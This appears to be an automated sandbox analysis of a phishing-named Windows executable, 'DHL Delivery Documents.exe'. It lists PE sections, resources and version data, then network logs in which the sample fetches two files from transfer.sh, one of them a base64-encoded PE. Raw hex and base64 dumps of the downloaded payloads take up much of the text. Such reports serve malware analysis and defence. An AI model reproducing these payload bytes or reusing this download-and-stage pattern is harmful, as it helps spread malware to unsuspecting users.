IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2000 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x37e0 | 0x3800 | False | 0.435965401786 | data | 5.4642521586 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0x6000 | 0x8328 | 0x8400 | False | 0.587446732955 | data | 6.83628691595 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_ICON | 0x61c0 | 0x468 | GLS_BINARY_LSB_FIRST | |
RT_ICON | 0x6628 | 0x1128 | data | |
RT_ICON | 0x7750 | 0x2668 | data | |
RT_ICON | 0x9db8 | 0x40a2 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | |
RT_GROUP_ICON | 0xde5c | 0x3e | data | |
RT_VERSION | 0xde9c | 0x2a0 | data | |
RT_MANIFEST | 0xe13c | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |
Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright 2022
Assembly Version | 1.0.0.0
InternalName | BNCXGAS.exe
FileVersion | 1.0.0.0
ProductName | BNCXGAS
ProductVersion | 1.0.0.0
FileDescription | BNCXGAS
OriginalFilename | BNCXGAS.exe
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 28, 2022 14:03:28.227101088 CET | 53910 | 53 | 192.168.2.3 | 8.8.8.8
Jan 28, 2022 14:03:28.246570110 CET | 53 | 53910 | 8.8.8.8 | 192.168.2.3
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 28, 2022 14:03:28.227101088 CET | 192.168.2.3 | 8.8.8.8 | 0x9264 | Standard query (0) | transfer.sh | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 28, 2022 14:03:28.246570110 CET | 8.8.8.8 | 192.168.2.3 | 0x9264 | No error (0) | transfer.sh | | 144.76.136.153 | A (IP address) | IN (0x0001)
                        • transfer.sh
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49751 | 144.76.136.153 | 443 | C:\Users\user\Desktop\DHL Delivery Documents.exe
Timestamp | kBytes transferred | Direction | Data
2022-01-28 13:03:28 UTC | 0 | OUT | GET /get/mVKia7/BINCC.txt HTTP/1.1
Host: transfer.sh
Connection: Keep-Alive
2022-01-28 13:03:29 UTC | 0 | IN | HTTP/1.1 200 OK
                        Server: nginx/1.14.2
                        Date: Fri, 28 Jan 2022 13:03:29 GMT
                        Content-Type: text/plain; charset=utf-8
                        Content-Length: 223232
                        Connection: close
                        Content-Disposition: attachment; filename="BINCC.txt"
                        Retry-After: Fri, 28 Jan 2022 14:03:32 GMT
                        X-Made-With: <3 by DutchCoders
                        X-Ratelimit-Key: 127.0.0.1,84.17.52.16,84.17.52.16
                        X-Ratelimit-Limit: 10
                        X-Ratelimit-Rate: 600
                        X-Ratelimit-Remaining: 9
                        X-Ratelimit-Reset: 1643375012
                        X-Remaining-Days: n/a
                        X-Remaining-Downloads: n/a
                        X-Served-By: Proudly served by DutchCoders
                        Data Ascii: cNxECslydlVi+yLTQiLgdgHAACFwHQSg7hkIAAAAHQJUejB9v//g8QEXcOobfSKO/6etIUJBS1Vi+yB7KACAACLRQyLSAhTM9tWaP4BAACNhWL9//8z0lNQiV3QiU3Mx0WkGAAAAIldqIldsIldrIldtIlduGaJlWD9///oZkIBAIt1CI1NzFGNVaRSaAEEAACNRQxQVuicIAEAg8QghcAPiPgAAACLhqALAABXaPdeFMxTU1CNfhxXx0XUXABl
                        2022-01-28 13:03:29 UTC48INData Raw: 4d 48 41 42 51 50 47 41 34 53 39 77 50 37 2f 2f 34 6c 64 39 49 32 30 43 4a 6c 35 67 6c 71 4c 54 66 69 4c 52 66 7a 42 79 67 4b 4c 32 59 6c 56 2f 49 6c 31 2b 50 66 54 49 39 45 6a 32 4d 48 47 42 51 76 61 69 31 58 30 41 2f 4d 44 74 4c 33 45 2f 76 2f 2f 69 55 58 30 69 30 58 34 6a 62 51 57 6d 58 6d 43 57 6f 74 56 2f 4d 48 4a 41 6f 50 48 42 59 76 65 69 56 33 34 69 58 33 38 67 2f 38 55 44 34 7a 79 2f 76 2f 2f 76 78 51 41 41 41 44 42 78 67 57 4c 32 6a 50 5a 4d 39 67 44 38 77 4f 30 76 62 54 2b 2f 2f 2b 4c 58 66 54 42 79 41 4b 4a 56 66 53 4e 74 42 36 68 36 39 6c 75 69 31 33 34 69 58 58 34 77 63 59 46 69 39 45 7a 30 44 50 54 41 2f 49 44 74 4c 32 34 2f 76 2f 2f 69 31 58 30 6a 5a 51 57 6f 65 76 5a 62 73 48 4c 41 6f 76 77 4d 38 4f 4a 54 66 53 4c 54 66 67 7a 77 59 6c 56
                        Data Ascii: MHABQPGA4S9wP7//4ld9I20CJl5glqLTfiLRfzBygKL2YlV/Il1+PfTI9Ej2MHGBQvai1X0A/MDtL3E/v//iUX0i0X4jbQWmXmCWotV/MHJAoPHBYveiV34iX38g/8UD4zy/v//vxQAAADBxgWL2jPZM9gD8wO0vbT+//+LXfTByAKJVfSNtB6h69lui134iXX4wcYFi9Ez0DPTA/IDtL24/v//i1X0jZQWoevZbsHLAovwM8OJTfSLTfgzwYlV
                        2022-01-28 13:03:29 UTC64INData Raw: 32 67 41 49 41 41 41 56 75 68 4d 35 41 41 41 4d 38 6d 44 78 41 69 46 77 41 2b 56 77 59 6d 47 36 41 63 41 41 46 36 4c 77 59 76 6c 58 63 4f 66 6e 42 6b 79 61 56 57 4c 37 49 48 73 56 41 49 41 41 46 59 7a 77 47 67 47 41 67 41 41 55 49 32 4e 72 76 33 2f 2f 31 46 6d 69 59 57 73 2f 66 2f 2f 36 4a 76 69 41 41 44 6f 68 52 55 42 41 46 44 6f 49 4f 67 41 41 49 74 31 43 49 50 45 45 49 6d 47 33 44 34 41 41 4f 6a 71 2b 51 41 41 69 30 41 44 68 63 41 50 68 49 38 43 41 41 41 39 69 49 69 49 69 41 2b 45 68 41 49 41 41 46 64 71 50 31 61 4a 68 74 67 48 41 41 43 4e 76 70 51 4d 41 41 44 6f 70 48 34 41 41 49 75 57 70 41 77 41 41 46 42 71 41 47 6f 41 55 6c 66 6f 55 6e 38 41 41 47 70 41 56 6f 6d 47 73 41 77 41 41 4f 69 45 66 67 41 41 55 49 75 47 70 41 77 41 41 47 6f 41 61 67 42 51
                        Data Ascii: 2gAIAAAVuhM5AAAM8mDxAiFwA+VwYmG6AcAAF6LwYvlXcOfnBkyaVWL7IHsVAIAAFYzwGgGAgAAUI2Nrv3//1FmiYWs/f//6JviAADohRUBAFDoIOgAAIt1CIPEEImG3D4AAOjq+QAAi0ADhcAPhI8CAAA9iIiIiA+EhAIAAFdqP1aJhtgHAACNvpQMAADopH4AAIuWpAwAAFBqAGoAUlfoUn8AAGpAVomGsAwAAOiEfgAAUIuGpAwAAGoAagBQ
                        2022-01-28 13:03:29 UTC80INData Raw: 2b 68 43 73 67 41 41 67 38 51 49 58 37 67 42 41 41 41 41 58 6f 76 6c 58 63 50 48 4f 78 46 74 56 59 76 73 56 6f 74 31 43 46 62 6f 4d 37 55 41 41 41 50 41 55 46 62 6f 61 72 49 41 41 49 74 46 44 47 6f 41 55 46 62 6f 6a 72 59 41 41 46 62 6f 47 4c 55 41 41 49 50 45 48 47 61 44 66 45 62 2b 58 48 51 53 56 75 67 48 74 51 41 41 75 56 77 41 41 41 43 44 78 41 52 6d 69 51 78 47 56 75 6a 31 74 41 41 41 75 69 6f 41 41 41 43 44 78 41 52 6d 69 52 52 47 58 6c 33 44 64 66 6a 4f 6f 64 59 61 56 59 76 73 56 6f 74 31 43 46 64 57 36 4e 4b 30 41 41 41 44 77 46 42 57 36 41 6d 79 41 41 43 4c 52 51 78 71 41 46 42 57 36 43 32 32 41 41 42 57 36 4c 65 30 41 41 43 4c 66 52 43 44 78 42 78 6d 67 33 78 47 2f 6c 78 30 47 47 61 44 50 31 78 30 45 6c 62 6f 6e 62 51 41 41 4c 6c 63 41 41 41 41
                        Data Ascii: +hCsgAAg8QIX7gBAAAAXovlXcPHOxFtVYvsVot1CFboM7UAAAPAUFboarIAAItFDGoAUFbojrYAAFboGLUAAIPEHGaDfEb+XHQSVugHtQAAuVwAAACDxARmiQxGVuj1tAAAuioAAACDxARmiRRGXl3DdfjOodYaVYvsVot1CFdW6NK0AAADwFBW6AmyAACLRQxqAFBW6C22AABW6Le0AACLfRCDxBxmg3xG/lx0GGaDP1x0ElbonbQAALlcAAAA
                        2022-01-28 13:03:29 UTC96INData Raw: 52 68 71 41 47 6f 56 56 6c 66 6f 36 78 73 41 41 49 50 45 45 49 58 41 64 51 5a 66 58 6f 76 6c 58 63 4e 66 75 41 45 41 41 41 42 65 69 2b 56 64 77 32 4b 61 47 6c 57 4c 37 49 50 73 4d 44 50 41 56 6f 74 31 44 4d 5a 46 38 41 43 4a 52 66 47 4a 52 66 57 4a 52 66 6c 6d 69 55 58 39 69 45 58 2f 5a 6f 6c 46 30 49 6c 46 30 6f 6c 46 31 6f 6c 46 32 6f 6c 46 33 6f 6c 46 34 6f 6c 46 35 6f 6c 46 36 6d 61 4a 52 65 36 46 39 67 2b 45 79 77 41 41 41 49 74 47 43 49 50 34 41 6e 55 2b 44 37 64 57 45 49 74 31 43 49 31 4e 38 46 46 71 43 47 6f 41 55 6f 31 47 48 46 44 6f 43 6f 51 41 41 49 31 4e 38 46 47 4e 56 64 42 53 36 4c 32 49 41 41 43 4c 6a 67 51 4b 41 41 42 71 41 49 31 46 30 46 42 52 36 42 75 47 41 41 43 4e 56 64 42 53 36 30 43 44 2b 41 52 31 55 49 74 4f 45 49 74 31 43 49 31 46
                        Data Ascii: RhqAGoVVlfo6xsAAIPEEIXAdQZfXovlXcNfuAEAAABei+Vdw2KaGlWL7IPsMDPAVot1DMZF8ACJRfGJRfWJRflmiUX9iEX/ZolF0IlF0olF1olF2olF3olF4olF5olF6maJRe6F9g+EywAAAItGCIP4AnU+D7dWEIt1CI1N8FFqCGoAUo1GHFDoCoQAAI1N8FGNVdBS6L2IAACLjgQKAABqAI1F0FBR6BuGAACNVdBS60CD+AR1UItOEIt1CI1F
                        2022-01-28 13:03:29 UTC112INData Raw: 66 78 2f 5a 32 4b 54 50 7a 76 41 5a 49 43 38 43 39 2b 31 49 55 75 75 64 70 63 39 79 6f 47 37 56 43 4d 2b 55 4c 57 67 49 47 47 41 65 6f 64 69 74 6b 61 4c 68 69 4b 2b 58 58 35 31 7a 34 73 39 68 4e 4f 58 49 6d 6d 51 34 47 6c 36 33 56 61 49 47 59 35 70 55 50 51 46 51 62 47 4d 4b 6e 48 68 4b 45 6f 36 43 58 6e 73 54 65 45 38 48 53 66 78 67 38 4a 4c 4c 6c 4d 31 39 37 4b 32 4c 66 6b 49 73 70 63 36 62 55 48 2b 2f 6f 58 56 59 2f 33 55 68 43 73 7a 30 35 2f 45 30 79 4f 75 64 78 74 72 61 73 35 4a 4d 53 4b 77 58 77 57 72 58 7a 55 4d 73 6c 36 4d 62 48 52 4b 55 5a 49 58 7a 6a 51 6d 65 79 52 6b 52 6d 45 32 6b 66 2b 72 72 66 48 50 74 73 55 58 52 58 75 48 4f 68 54 73 48 4e 73 76 44 64 4d 42 36 46 58 6a 6a 71 46 2f 79 4b 52 4a 34 74 35 6e 79 30 6f 58 35 50 55 71 42 70 64 50
                        Data Ascii: fx/Z2KTPzvAZIC8C9+1IUuudpc9yoG7VCM+ULWgIGGAeoditkaLhiK+XX51z4s9hNOXImmQ4Gl63VaIGY5pUPQFQbGMKnHhKEo6CXnsTeE8HSfxg8JLLlM197K2LfkIspc6bUH+/oXVY/3UhCsz05/E0yOudxtras5JMSKwXwWrXzUMsl6MbHRKUZIXzjQmeyRkRmE2kf+rrfHPtsUXRXuHOhTsHNsvDdMB6FXjjqF/yKRJ4t5ny0oX5PUqBpdP
                        2022-01-28 13:03:29 UTC128INData Raw: 41 43 44 78 41 68 66 58 6c 75 4c 35 56 33 44 61 67 53 4e 52 64 78 51 6a 55 38 42 6a 56 63 53 55 63 64 46 33 43 4d 41 41 41 43 4a 56 64 6a 6f 51 43 49 41 41 47 6f 45 6a 56 58 59 55 6f 31 48 42 6c 44 6f 4d 53 49 41 41 47 6f 45 6a 55 59 55 55 49 31 50 44 46 48 47 52 77 76 71 36 42 34 69 41 41 43 4c 56 66 78 53 5a 73 64 48 45 44 4d 41 55 38 64 47 45 41 45 41 41 41 44 6f 35 79 45 41 41 49 50 45 4c 46 39 65 57 34 76 6c 58 63 4d 54 65 50 45 36 4b 79 5a 41 67 76 6b 53 76 6f 50 4c 56 59 76 73 69 30 55 49 69 30 67 51 56 6d 6f 48 61 67 42 52 6a 62 43 38 43 77 41 41 56 6c 44 6f 39 42 49 41 41 49 74 56 47 49 74 46 46 49 74 4e 45 49 50 45 46 46 4b 4c 56 51 78 51 69 77 5a 52 55 76 2f 51 58 6c 33 44 58 4e 70 38 4e 47 46 51 7a 57 6d 4e 71 31 57 4c 37 49 74 46 43 49 74 49
                        Data Ascii: ACDxAhfXluL5V3DagSNRdxQjU8BjVcSUcdF3CMAAACJVdjoQCIAAGoEjVXYUo1HBlDoMSIAAGoEjUYUUI1PDFHGRwvq6B4iAACLVfxSZsdHEDMAU8dGEAEAAADo5yEAAIPELF9eW4vlXcMTePE6KyZAgvkSvoPLVYvsi0UIi0gQVmoHagBRjbC8CwAAVlDo9BIAAItVGItFFItNEIPEFFKLVQxQiwZRUv/QXl3DXNp8NGFQzWmNq1WL7ItFCItI
                        2022-01-28 13:03:29 UTC144INData Raw: 30 45 4a 64 4d 65 46 51 50 6a 2f 2f 38 4e 67 66 56 44 48 68 55 54 34 2f 2f 2b 52 66 42 42 42 78 34 56 49 2b 50 2f 2f 43 31 6c 58 59 38 65 46 54 50 6a 2f 2f 34 71 31 36 68 33 48 68 56 44 34 2f 2f 39 35 72 41 6a 33 78 34 56 55 2b 50 2f 2f 43 4f 4f 74 63 38 65 46 57 50 6a 2f 2f 38 59 65 5a 61 48 48 68 56 7a 34 2f 2f 2f 6e 42 6a 33 4b 78 34 56 67 2b 50 2f 2f 78 43 62 53 4f 73 65 46 5a 50 6a 2f 2f 77 67 7a 2f 4c 4c 48 68 57 6a 34 2f 2f 2f 50 42 6c 56 68 69 49 31 73 2b 50 2f 2f 36 47 76 79 2f 2f 2b 44 78 41 79 4e 68 65 44 33 2f 2f 2b 46 39 6e 51 4b 54 67 2b 32 43 49 31 45 43 41 46 31 39 6f 31 77 41 51 2b 32 41 49 31 56 34 46 4a 51 56 75 68 44 36 2f 37 2f 4d 38 43 44 78 41 77 34 42 6e 51 48 51 49 41 38 42 67 42 31 2b 59 74 64 43 45 42 51 56 6c 50 6f 70 2f 48 2f
                        Data Ascii: 0EJdMeFQPj//8NgfVDHhUT4//+RfBBBx4VI+P//C1lXY8eFTPj//4q16h3HhVD4//95rAj3x4VU+P//COOtc8eFWPj//8YeZaHHhVz4///nBj3Kx4Vg+P//xCbSOseFZPj//wgz/LLHhWj4///PBlVhiI1s+P//6Gvy//+DxAyNheD3//+F9nQKTg+2CI1ECAF19o1wAQ+2AI1V4FJQVuhD6/7/M8CDxAw4BnQHQIA8BgB1+YtdCEBQVlPop/H/
                        2022-01-28 13:03:29 UTC160INData Raw: 50 6c 5a 4a 42 33 4d 75 47 4a 6f 54 50 42 43 6b 56 71 54 58 66 74 6f 67 78 55 73 30 52 75 74 68 58 33 67 59 35 67 6f 2b 74 6b 61 65 77 5a 2f 50 48 51 62 43 76 47 59 4e 57 77 37 7a 33 2b 65 58 43 6f 7a 30 63 71 72 4b 65 6a 79 47 30 41 39 48 36 47 31 79 30 2b 50 51 44 70 4e 76 4b 57 77 58 52 32 52 65 49 54 77 57 64 66 38 4b 62 36 31 71 6f 52 34 4e 6b 64 32 72 72 59 70 69 75 79 4c 73 64 72 52 73 42 6c 2f 33 6c 64 65 64 37 56 51 48 34 43 49 5a 71 71 7a 4a 57 46 7a 49 63 58 64 74 58 72 43 39 54 4b 61 63 46 41 72 46 74 72 7a 49 4b 7a 6e 73 31 4c 4a 62 63 72 52 51 67 49 61 79 50 50 71 53 76 34 50 44 2f 38 69 34 39 2b 41 6d 5a 4a 39 65 48 4b 74 6a 37 7a 63 61 67 34 52 72 70 69 30 57 64 33 59 63 47 2f 32 2f 6b 77 47 62 39 39 66 6d 54 72 4a 4f 2b 55 42 2b 42 72 52
                        Data Ascii: PlZJB3MuGJoTPBCkVqTXftogxUs0RuthX3gY5go+tkaewZ/PHQbCvGYNWw7z3+eXCoz0cqrKejyG0A9H6G1y0+PQDpNvKWwXR2ReITwWdf8Kb61qoR4Nkd2rrYpiuyLsdrRsBl/3lded7VQH4CIZqqzJWFzIcXdtXrC9TKacFArFtrzIKzns1LJbcrRQgIayPPqSv4PD/8i49+AmZJ9eHKtj7zcag4Rrpi0Wd3YcG/2/kwGb99fmTrJO+UB+BrR
                        2022-01-28 13:03:29 UTC176INData Raw: 61 72 30 6b 4d 6e 52 6d 37 5a 31 62 39 45 41 78 44 5a 49 4d 6b 68 78 51 64 57 62 58 55 6e 4f 4f 79 76 69 4c 42 75 73 5a 44 57 52 58 30 58 6b 6e 38 42 4f 68 4c 46 77 70 36 34 6a 48 39 64 43 4c 38 4f 58 67 75 6b 4c 42 6e 4f 76 75 32 51 59 78 33 6e 32 33 51 36 61 4c 56 43 7a 42 78 71 43 35 4f 68 62 79 30 36 45 46 43 72 36 72 64 42 50 32 31 71 48 63 34 38 4d 6f 31 7a 34 52 73 49 36 32 34 51 53 33 6a 77 4e 65 36 54 68 39 49 64 6b 4f 5a 72 63 70 2f 58 42 57 59 4b 38 76 48 7a 70 54 4c 67 59 70 6a 50 45 71 67 66 73 31 45 38 74 69 77 4f 74 62 72 61 4c 2b 67 53 4e 30 68 41 68 62 47 71 6f 6e 56 69 36 78 71 53 39 2f 57 41 37 36 30 76 67 4e 68 36 31 35 4b 6a 36 33 77 35 77 4f 61 63 53 49 46 6b 36 55 57 32 45 4a 77 45 79 67 35 2f 33 64 55 63 42 65 68 64 46 6d 54 73 49
                        Data Ascii: ar0kMnRm7Z1b9EAxDZIMkhxQdWbXUnOOyviLBusZDWRX0Xkn8BOhLFwp64jH9dCL8OXgukLBnOvu2QYx3n23Q6aLVCzBxqC5Ohby06EFCr6rdBP21qHc48Mo1z4RsI624QS3jwNe6Th9IdkOZrcp/XBWYK8vHzpTLgYpjPEqgfs1E8tiwOtbraL+gSN0hAhbGqonVi6xqS9/WA760vgNh615Kj63w5wOacSIFk6UW2EJwEyg5/3dUcBehdFmTsI
                        2022-01-28 13:03:29 UTC192INData Raw: 44 36 68 6f 67 6a 49 79 4e 63 53 74 65 38 33 35 4f 5a 73 56 31 77 74 43 67 75 6c 62 44 5a 49 41 72 78 37 38 45 79 4b 66 31 4c 67 64 69 43 47 4b 31 68 6e 4b 4b 67 65 68 36 74 69 70 77 32 72 62 4f 79 48 65 6d 71 4b 55 58 59 45 58 5a 31 30 4e 71 69 6e 44 37 79 35 4c 59 78 38 38 71 6b 62 70 4b 63 2b 41 46 6c 6f 48 52 36 4e 52 31 39 69 44 53 72 70 6f 4c 4a 74 63 4e 51 69 48 4b 2b 34 53 55 58 75 46 66 4d 4e 48 6d 6d 73 73 4e 6c 37 58 39 51 65 53 77 48 50 4f 64 34 77 35 32 65 53 65 68 56 48 74 36 62 7a 76 34 55 50 71 66 51 58 42 35 4f 58 52 4a 33 52 47 38 7a 37 5a 32 32 56 52 32 62 4c 47 6c 65 2f 44 47 69 45 45 45 6a 37 41 71 6a 4f 48 66 66 55 33 44 67 33 7a 2f 52 6e 35 4b 74 35 30 49 45 6e 45 4d 63 70 57 74 71 6a 50 39 77 53 30 57 61 6b 59 41 5a 52 5a 54 6d 5a
                        Data Ascii: D6hogjIyNcSte835OZsV1wtCgulbDZIArx78EyKf1LgdiCGK1hnKKgeh6tipw2rbOyHemqKUXYEXZ10NqinD7y5LYx88qkbpKc+AFloHR6NR19iDSrpoLJtcNQiHK+4SUXuFfMNHmmssNl7X9QeSwHPOd4w52eSehVHt6bzv4UPqfQXB5OXRJ3RG8z7Z22VR2bLGle/DGiEEEj7AqjOHffU3Dg3z/Rn5Kt50IEnEMcpWtqjP9wS0WakYAZRZTmZ
                        2022-01-28 13:03:29 UTC208INData Raw: 56 4d 39 6c 67 37 66 6a 64 7a 63 43 58 44 37 49 61 68 70 46 39 51 57 4a 6b 43 6b 6e 45 32 62 69 2f 59 47 35 38 77 4a 42 7a 69 64 2f 4b 4c 54 62 52 46 45 4f 64 75 72 47 5a 4e 52 35 6b 62 37 4b 31 49 4e 38 59 69 48 4a 4d 5a 39 52 72 36 4f 51 36 41 6b 4d 66 65 57 37 4d 4c 74 4b 78 69 57 4f 77 6b 66 68 53 73 39 4f 37 2b 66 4b 6d 6c 4e 56 59 37 47 44 66 55 74 44 35 4f 64 73 69 31 6b 71 62 7a 77 4d 50 76 2f 6f 47 66 41 61 64 70 79 6f 67 50 49 6b 4d 4f 4f 69 6c 4b 32 4b 50 68 72 75 49 66 35 31 44 4d 46 65 43 33 41 6d 58 75 7a 55 61 68 42 36 41 34 67 6a 4c 4b 50 76 30 45 44 6c 50 67 2b 57 77 7a 2b 69 35 35 6c 5a 72 75 66 30 73 66 62 70 64 52 48 4d 77 43 4b 4c 61 45 42 39 4a 56 2b 50 79 38 6f 36 44 35 56 78 57 6b 4d 74 59 47 62 34 55 41 67 6e 52 78 38 4c 69 68 4c
                        Data Ascii: VM9lg7fjdzcCXD7IahpF9QWJkCknE2bi/YG58wJBzid/KLTbRFEOdurGZNR5kb7K1IN8YiHJMZ9Rr6OQ6AkMfeW7MLtKxiWOwkfhSs9O7+fKmlNVY7GDfUtD5Odsi1kqbzwMPv/oGfAadpyogPIkMOOilK2KPhruIf51DMFeC3AmXuzUahB6A4gjLKPv0EDlPg+Wwz+i55lZruf0sfbpdRHMwCKLaEB9JV+Py8o6D5VxWkMtYGb4UAgnRx8LihL


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        1 | 192.168.2.3 | 49752 | 144.76.136.153 | 443 | C:\Users\user\Desktop\DHL Delivery Documents.exe
                        Timestamp | kBytes transferred | Direction | Data
                        2022-01-28 13:03:29 UTC | 218 | OUT | GET /get/KkxDr1/bbbbbbbbbbb.txt HTTP/1.1
                        Host: transfer.sh
                        2022-01-28 13:03:29 UTC | 218 | IN | HTTP/1.1 200 OK
                        Server: nginx/1.14.2
                        Date: Fri, 28 Jan 2022 13:03:29 GMT
                        Content-Type: text/plain; charset=utf-8
                        Content-Length: 53932
                        Connection: close
                        Content-Disposition: attachment; filename="bbbbbbbbbbb.txt"
                        Retry-After: Fri, 28 Jan 2022 14:03:32 GMT
                        X-Made-With: <3 by DutchCoders
                        X-Ratelimit-Key: 127.0.0.1,84.17.52.16,84.17.52.16
                        X-Ratelimit-Limit: 10
                        X-Ratelimit-Rate: 600
                        X-Ratelimit-Remaining: 8
                        X-Ratelimit-Reset: 1643375012
                        X-Remaining-Days: n/a
                        X-Remaining-Downloads: n/a
                        X-Served-By: Proudly served by DutchCoders
                        2022-01-28 13:03:29 UTC219INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 41 45 65 38 32 45 41 41 41 41 41 41 41 41 41 41 4f 41 41 4c 69 41 4c 41 56 41 41 41 4a 59 41 41 41 43 61 41 41 41 41 41 41 41 41 55 72 55 41 41 41 41 67 41 41 41 41 77 41 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                        Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAEe82EAAAAAAAAAAOAALiALAVAAAJYAAACaAAAAAAAAUrUAAAAgAAAAwAAAAABAAAAgAAAAAgA
                        2022-01-28 13:03:29 UTC234INData Raw: 6a 67 41 41 42 68 51 71 63 75 55 42 41 48 41 53 41 53 6a 61 41 41 41 4b 6a 46 4d 41 41 41 45 6f 36 67 41 41 43 6e 50 72 41 41 41 4b 65 67 41 44 4d 41 6b 41 44 77 41 41 41 41 41 41 41 41 41 43 4a 58 74 48 41 41 41 45 41 31 68 39 52 77 41 41 42 43 6f 41 45 7a 41 46 41 42 6b 41 41 41 41 55 41 41 41 52 41 6e 74 49 41 41 41 45 41 69 56 37 52 77 41 41 42 43 55 4b 46 31 68 39 52 77 41 41 42 41 61 52 4b 67 41 41 41 42 4d 77 42 41 41 6b 41 41 41 41 46 41 41 41 45 51 4a 37 52 77 41 41 42 41 6f 43 4a 58 74 48 41 41 41 45 47 6c 68 39 52 77 41 41 42 41 4a 37 53 41 41 41 42 41 59 6f 55 51 41 41 43 69 55 6d 4b 67 4d 77 42 51 42 4e 41 41 41 41 41 41 41 41 41 41 4a 37 53 41 41 41 42 41 51 6c 46 31 6a 2b 43 77 49 41 41 39 4b 63 41 6e 74 49 41 41 41 45 42 43 55 58 57 50 34
                        Data Ascii: jgAABhQqcuUBAHASASjaAAAKjFMAAAEo6gAACnPrAAAKegADMAkADwAAAAAAAAACJXtHAAAEA1h9RwAABCoAEzAFABkAAAAUAAARAntIAAAEAiV7RwAABCUKF1h9RwAABAaRKgAAABMwBAAkAAAAFAAAEQJ7RwAABAoCJXtHAAAEGlh9RwAABAJ7SAAABAYoUQAACiUmKgMwBQBNAAAAAAAAAAJ7SAAABAQlF1j+CwIAA9KcAntIAAAEBCUXWP4
                        2022-01-28 13:03:29 UTC250INData Raw: 64 58 52 6c 41 46 42 79 62 32 4e 6c 63 33 4d 41 55 48 4a 76 59 32 56 7a 63 30 31 76 5a 48 56 73 5a 51 42 51 63 6d 39 6a 5a 58 4e 7a 54 57 39 6b 64 57 78 6c 51 32 39 73 62 47 56 6a 64 47 6c 76 62 67 42 51 62 32 6c 75 64 41 42 54 61 58 70 6c 41 46 4e 70 65 6d 56 47 41 45 56 34 59 32 56 77 64 47 6c 76 62 67 42 44 64 57 78 30 64 58 4a 6c 53 57 35 6d 62 77 42 54 65 58 4e 30 5a 57 30 75 52 32 78 76 59 6d 46 73 61 58 70 68 64 47 6c 76 62 67 42 4f 64 57 31 69 5a 58 4a 54 64 48 6c 73 5a 58 4d 41 53 55 46 7a 65 57 35 6a 55 6d 56 7a 64 57 78 30 41 45 6c 45 61 58 4e 77 62 33 4e 68 59 6d 78 6c 41 45 6c 75 64 44 45 32 41 45 6c 75 64 44 4d 79 41 45 6c 75 64 44 59 30 41 45 6c 75 64 46 42 30 63 67 42 43 61 57 35 68 63 6e 6c 53 5a 57 46 6b 5a 58 49 41 55 33 6c 7a 64 47 56
                        Data Ascii: dXRlAFByb2Nlc3MAUHJvY2Vzc01vZHVsZQBQcm9jZXNzTW9kdWxlQ29sbGVjdGlvbgBQb2ludABTaXplAFNpemVGAEV4Y2VwdGlvbgBDdWx0dXJlSW5mbwBTeXN0ZW0uR2xvYmFsaXphdGlvbgBOdW1iZXJTdHlsZXMASUFzeW5jUmVzdWx0AElEaXNwb3NhYmxlAEludDE2AEludDMyAEludDY0AEludFB0cgBCaW5hcnlSZWFkZXIAU3lzdGV
                        2022-01-28 13:03:29 UTC266INData Raw: 41 41 41 41 41 41 59 67 41 51 45 52 67 4a 30 70 41 51 41 6b 36 62 75 52 36 61 32 55 35 34 36 4c 36 62 75 52 36 61 32 55 35 34 36 4c 36 62 75 52 36 61 32 55 35 34 36 4c 36 62 75 52 36 61 32 55 35 34 36 4c 41 41 41 58 41 51 41 53 51 32 39 77 65 58 4a 70 5a 32 68 30 49 4d 4b 70 49 43 41 79 4d 44 49 78 41 41 41 70 41 51 41 6b 5a 6a 5a 6d 4e 6a 6b 33 4e 7a 59 74 59 54 51 31 4d 53 30 30 5a 44 55 30 4c 54 6b 78 4d 6a 67 74 4e 44 64 6b 5a 6d 59 77 4e 44 4d 79 5a 6d 4d 33 41 41 41 4d 41 51 41 48 4d 53 34 77 4c 6a 41 75 4d 41 41 41 52 77 45 41 47 69 35 4f 52 56 52 47 63 6d 46 74 5a 58 64 76 63 6d 73 73 56 6d 56 79 63 32 6c 76 62 6a 31 32 4e 43 34 77 41 51 42 55 44 68 52 47 63 6d 46 74 5a 58 64 76 63 6d 74 45 61 58 4e 77 62 47 46 35 54 6d 46 74 5a 52 41 75 54 6b 56
